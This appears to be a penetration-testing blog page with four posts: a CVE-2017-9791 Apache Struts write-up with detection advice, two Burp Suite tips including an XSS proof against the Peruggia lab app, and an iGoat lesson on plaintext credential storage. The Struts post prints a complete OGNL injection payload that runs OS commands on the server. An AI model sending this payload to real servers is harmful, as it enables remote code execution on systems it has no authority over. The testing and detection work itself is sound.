Categories
penetration testing

CVE-2017-9791 exploit details

Was looking back through some of my notes and came across this write up I did for a Struts exploit. Nothing crazy but what I liked about the notes I captured was around detection on what defenders could have alerted on when this exploit came out. Enjoy!

Confirmed publicly released exploits of CVE-2017-9791 do allow remote code execution with privileges of the web server.  In recent vulnerabilities involving Struts and others it appears that most business functions follow the best practice of running the web server without admin or root privileges but of course this needs to be confirmed on a case by case basis.

The vulnerable functionality within Struts 2.3.X and below is a sample Struts application that comes bundled by default named struts2-showcase, this application is not installed by default so one would have to intentionally deploy this application.  Below is a screenshot showing it deployed.

Below is a screenshot of the vulnerable functionality within Showcase.

The URL to access this functionality is http://hostname.com/struts2-showcase/integration/editGangster.action, once there one can fill out the forms and submit the request to test the working example.  Once that request is submitted it goes to the server as a post request.

POST /struts2-showcase/integration/saveGangster.action

Knowing if these URLs exist is one way of determining if the underlying Struts system is vulnerable as Struts 2.5.X does not contain this functionality.  Struts 2.5.X will contain the struts2-showcase application but not the Struts1 plugin. In comparing the downloads of different Struts version only the ones with the “struts2-struts1-plugin” Jar file were vulnerable.

So if the vulnerable application isn’t deployed but you had access to the file system of the web server then checking for the struts2-struts1-plugin Jar file is another way of confirming if the underlying system could be exposed in the future.

We used publicly known techniques to confirm exploitation was possible, similar to a posting here https://github.com/nixawk/labs/issues/8.  Sending a specialized URL request with a proof of concept to execute the command whoami can be seen below.

The request has to be URL encoded but the complete translation is below.

POST /struts2-showcase/integration/saveGangster.action HTTP/1.0

Content-Length: 1187

Host: 192.168.142.216:8080

Content-Type: application/x-www-form-urlencoded

Connection: close

User-Agent: Python-urllib/2.7

name=%{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’whoami’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}&age=1337&__cheackbox_bustedBefore=true&description=blah

Here is the exploit being ran from the command line via a python script.

If logging is enabled within Tomcat it will have the individual URL requests, in Windows these logs are located in c:\Program Files (x86)\Apache Software Foundation\Tomcat\logs with the name of the log being localhost_access_log.date.  A snippet of these logs are below with the last request being the saveGangster.action request.

192.168.142.216 – – [08/Jul/2017:20:03:51 -0400] “GET / HTTP/1.1” 200 11418

192.168.142.216 – admin [08/Jul/2017:20:03:53 -0400] “GET /manager/html HTTP/1.1” 200 12398

192.168.142.216 – admin [08/Jul/2017:20:04:40 -0400] “POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=817A45627CEDACBC2F98D9BF3B598839 HTTP/1.1” 200 14179

192.168.142.128 – admin [08/Jul/2017:20:04:55 -0400] “GET /manager/html HTTP/1.1” 200 14179

192.168.142.128 – – [08/Jul/2017:20:04:55 -0400] “GET /manager/images/tomcat.gif HTTP/1.1” 304 –

192.168.142.128 – – [08/Jul/2017:20:04:55 -0400] “GET /manager/images/asf-logo.svg HTTP/1.1” 304 –

192.168.142.128 – – [08/Jul/2017:20:05:00 -0400] “GET /struts2-showcase/index.action HTTP/1.1” 200 10870

192.168.142.128 – – [08/Jul/2017:20:05:00 -0400] “GET /struts2-showcase/struts/utils.js HTTP/1.1” 200 4730

192.168.142.128 – – [08/Jul/2017:20:05:07 -0400] “GET /struts2-showcase/integration/editGangster.action HTTP/1.1” 200 12001

192.168.142.128 – – [08/Jul/2017:20:05:07 -0400] “GET /struts2-showcase/struts/xhtml/styles.css HTTP/1.1” 200 1093

192.168.142.128 – – [08/Jul/2017:20:05:07 -0400] “GET /struts2-showcase/struts/utils.js HTTP/1.1” 200 4730

192.168.142.128 – – [08/Jul/2017:20:10:16 -0400] “POST /struts2-showcase/integration/saveGangster.action HTTP/1.1” 200 11408

This remote code execution exploit has been proven to work on Windows and *nix systems.  For detection purposes simply looking for the gangster.action in logs would be a great indicator of malicious activity but not the end all be all.  There are different styles of payloads that can be used to take advantage of this vulnerability so a combination of the gangster.action plus ONGL functionality plus OS style commands will be a better indicator of malicious activity.


Categories
http penetration testing proxy web security

Burp suite tip / tutorial: renaming tabs

This will be a quick and simple tip that you may not have been aware of, you can rename tabs within Burp. A friend of mine who works out of Raleigh turned me onto this. I find new sometimes obvious and hidden features in Burp all the time and this is one of them.

I find this feature handy especially in a large application as I can easily keep track of what I’m testing.  I use the tab renaming on the Repeater and Intruder functionality. In order to rename a tab simply double click the tab which will allow you to edit the tab.

Repeater before

Repeater after

Intruder before

Intruder after

Hope this simple tip helps you perform better application pen testing.

Categories
http penetration testing web security XSS

Burp suite tutorial / tip: using intercept to locate automated scanner findings

So the problem I have in my job and maybe others do as well is that when assessing a web application for vulnerabilities you want to throw automated tools at it first to get the low hanging fruit. So you get the results back and you have some good findings but you’re not exactly sure where that finding resides inside the application. Meaning first click here, then here, then here, and modify parameter X. It’s not crucial to know this because with burp or any decent web proxy we can replay that request to retrieve and prove the vulnerable results but when dealing with laymen and even developers you have to hand hold them through the exploitation process via the browser as much as possible hence the need to know where in the application the vulnerability exists.

In big applications simply knowing a what GET or POST request is vulnerable may not tell you where the vulnerability lies. Let’s say the scanner reports back that http://example.com/xskw/requestID?=blah is vulnerable, well this is a generic URL without much context so it’s not obvious where you would have to browse to stumble upon that request. It’s even worse for POST requests because going directly to the URL without the parameters can produce errors within the application.

Let’s walk through an example of using the burp intercept feature to find where scanner results are located. I’ll be using an intentionally vulnerable web application named Peruggia found within the owaspbwa project which is a great project to learn web app testing. So I ran the active scan against peruggia and got the following results.

I’m going to focus on the highlighted cross site scripting vulnerability in the screen shot above. I picked this request for a number of reasons but first let’s take a look the details of the request below.

Here we see it’s a POST request and I wanted to focus on a POST request because some of the challenges faced with these requests. In the top third tab we see the response was redirected which means we’ll get a 302 status code. If you were to copy and paste the URL into the browser and make that request you’ll be redirected to the home page. This is the nature of POST requests we can’t just put the URL into the address bar and be take to that location. Because of this it can be hard to determine where in the application the vulnerability exists. Especially for XSS (cross site scripting) vulnerabilities I like to obtain screen shots of the alert box to prove to the customer that I was able to exploit the vulnerability. With a GET request this is easier but POST requests add a level of difficulty.

Let’s walk through an example to understand the challenges. I’ll be starting out on the about page of the Peruggia application. Next I’ll paste the URL from the XSS finding into the address bar.

After I enter this request I get redirected to the home page.

This is also reflected in burp where we see the 302 redirect status code that sends us back to the home page.

So the challenge is to find that “comment” parameter that burp flagged as vulnerable but without a simple GET request this can be difficult. I didn’t pick the greatest example because the “comment” parameter shouldn’t be that hard to find in this application because it’s fairly small and the parameter is actually providing some context, adding a comment, which doesn’t always happen. So for this example let’s ignore the big comment box on the home page and pretend we didn’t see that.

We’ll now set up a rule inside the proxy intercept to alert us when we stumble across the vulnerable “comment” parameter. Let me explain the term stumble for a second. When I get a result back from a scanner and I’m not sure where it’s located inside the application I’ll typically start walking the application and monitor my proxy history to see if that parameter was passed within a request. This can be a pain in the butt so setting up a proxy intercept rule can help automate the process. The rule is somewhat counter intuitive because we’ll leave the intercept on the entire time and let it catch when it sees our parameter. In this case we’ll disable the default file extension match rule and add our new rule to look for the parameter in question. Below is the rule I setup to catch the vulnerable parameter “comment”.

Now the next thing is to start browsing / walking the application and the proxy intercept will automatically alert you when you come across the vulnerable parameter. So while walking the application I decide to post a comment on a picture to ensure I’m touching every functionality of the application. My intercept is on with my new rule waiting for it to flag the vulnerable parameter.

After I make this request my proxy starts blinking and alerting me to the fact that I’ve come across the “comment” parameter.

Unfortunately for large applications it may take some time before you stumble upon the proper vulnerable parameter but hopefully this will help you out when trying to pinpoint the location of automated findings. Of course once we’ve found the vulnerable parameter that the automated scanner has found we’ll want to capture a screenshot of the exploit and this case we’ll need to document that we’re abe to execute javascript inside the application. So now I’ll capture that POST request again and insert the classic javascript alert message.

And now the alert message proving to the application owner’s, developer’s, and customer’s that executing javascript is possible.

XSS FTW. Hopefully my little small tip will help you when trying to hunt down where in the application an automated finding resides. Happy bug hunting.

Categories
mobile penetration testing

Security testing iPhone – local data storage

One of the areas you need to focus on when performing security / penetration testing on iOS applications is what information is written to disk or stored locally. There are a number of things that can be written to disk (text files, config files, plist files, databases, etc). There are a handful of directories that an application typically uses to store local data within an iOS device which you’ll need to keep in mind when combing through the local file system. I’ll cover these directories and walk through an iOS application security assessment.

The application we’ll walk through is iGoat, an intentional vulnerable application written for the iPhone / iOS devices. The iGoat application can be ran inside the iOS Simulator which is free to use assuming you have an Apple OSX device. I’m not going to walk through setting up the iGoat application within the simulator, please check online resources for getting iGoat up and running. Once up and running go to “Data Protection (Rest)” > “Local Data Storage” and start the exercise. You’ll notice the exercise describes that it’s using an underlying SQLite database to store information, keep in mind you won’t normally know this information. Initially when performing a security test on an iOS application you won’t know if data is being stored locally, it could be it’s storing all information server side. If it does store data locally it can be in a number of locations and in different formats such as a SQLite database. Once you start the iGoat data storage exercise you should come to the following screen.

At this point just put in some fake username and password, I’ll choose username “super” and password “secret”. After you click “Login” nothing will happen, this isn’t meant to be a full blown application. So the application took input from the user but what happened to that information? The iOS simulator is no substitution for an iOS device but the behavior of the application remains the same, meaning if you’re testing an application in the simulator on your Macbook then if the application stores local data then that data will be stored in some location on your Macbook. The application data is typically stored in the following location on your OS X device.

/Users/travis/Library/Application Support/iPhone Simulator/5.1/Applications/UID

Where UID is a unique identifier for the application installed and of course you’ll substitute my name with your username in the “Users” directory. My UID in this case is “8813AE1B-3FC7-4503-99D0-666E974A74D7”. If you open up Finder in OS X and try to navigate to the Library directory you won’t see it that’s because it’s hidden, you can enable the viewing of hidden files and folders but I’ll be navigating via the Terminal which is in the Utilities folder under applications. Once in the UID directory perform a “ls -lh” command to see the files and directories the application is utilizing.

mac:8813AE1B-3FC7-4503-99D0-666E974A74D7 travis$ ls -lh
total 0
drwxr-xr-x   4 travis  staff   136B Sep 27 19:08 Documents
drwxr-xr-x   5 travis  staff   170B Jul 11 09:50 Library
drwxr-xr-x  28 travis  staff   952B Sep 25 21:44 iGoat.app
drwxr-xr-x   2 travis  staff    68B Jul 10 21:37 tmp

Here we see four directories (Documents, Library, iGoat.app, and tmp), we know they’re directories because each line begins with a “d”, if it wasn’t a directory you would just see a “-” dash. These are the four main directories you’ll have for each application and you’ll replace iGoat.app with whatever application you’re testing (e.g. AppName.app). When it comes to looking for items of interest when security testing one should focus on these four directories, listed below is a chart showing the type of information that can be found in those directories.

The contents and location are not set in stone but these locations are the best place to start. So now you know the location of where files may be stored locally on an iOS device but what’s the best way to discover the files we’re interested in? Let’s use what we know in this case, the application tells us that it stores login information into a SQL lite database. Normally you’re not going to know that the application uses a SQL lite database to store information unless you’re in close communication with the developers of the application. For now we know the app uses a SQL lite database so let’s search through these directories looking for that file. We could do this manually but I think dropping to a command prompt is always best. Use the “find” command to locate any SQL lite databases, the command is below.

mac:8813AE1B-3FC7-4503-99D0-666E974A74D7 travis$ find . -name *.sqlite
./Documents/credentials.sqlite
./iGoat.app/articles.sqlite
mac:8813AE1B-3FC7-4503-99D0-666E974A74D7 travis$

From the output of the find command we’ve located two SQL lite databases for this application, credentials.sqlite and articles.sqlite. Credentials.sqlite is the obvious place to start. There are multiple ways to view that sqlite file but the two I prefer are the sqlite database browser and the command line utility sqlite3. I’ll be sticking with the sqlite3 command to give you a different perspective as the sqlite database browser is GUI based and easier to use. One thing to note with GUI tool is that it can’t browse hidden directories so you’ll have to copy and paste sqlite database from the “hidden” Documents directory into a directory that the GUI tool can navigate tool. Next open the sqlite database with the command below.

travis@mac:Documents$ sqlite3 credentials.sqlite
SQLite version 3.7.14 2012-09-03 15:42:36
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
sqlite>

You’ll be presented with a sqlite prompt. Next issue the “.tables” command into the sqlite prompt.

sqlite> .tables
creds

Here we see a “creds” table, to view the contents of that table use the “.dump” command.

sqlite> .dump
PRAGMA foreign_keys=OFF;
BEGIN TRANSACTION;
CREATE TABLE creds (id INTEGER PRIMARY KEY AUTOINCREMENT, username TEXT, passwordTEXT);
INSERT INTO "creds" VALUES(1,'super','secret');
DELETE FROM sqlite_sequence;
INSERT INTO "sqlite_sequence" VALUES('creds',1);
COMMIT;

Here we see in the first INSERT statement the values of username and password that we typed into the application. So the vulnerability is that credentials to the application are stored in plain text so if someone were to remotely or locally gain access to the iphone then they could glean these credentials. It’s always best if possible to store credentials server side and if you must store credentials locally then encrypt that information. This goes for any sensitive information stored locally (text files, config files, plist files, etc). I could extend this example to those types of files but the same concept applies. So if you’re curios about one of your iOS apps check out those locations and if develop iOS applications make sure you store local sensitive information in an encrypted format.

Feel free to comment with questions or concerns.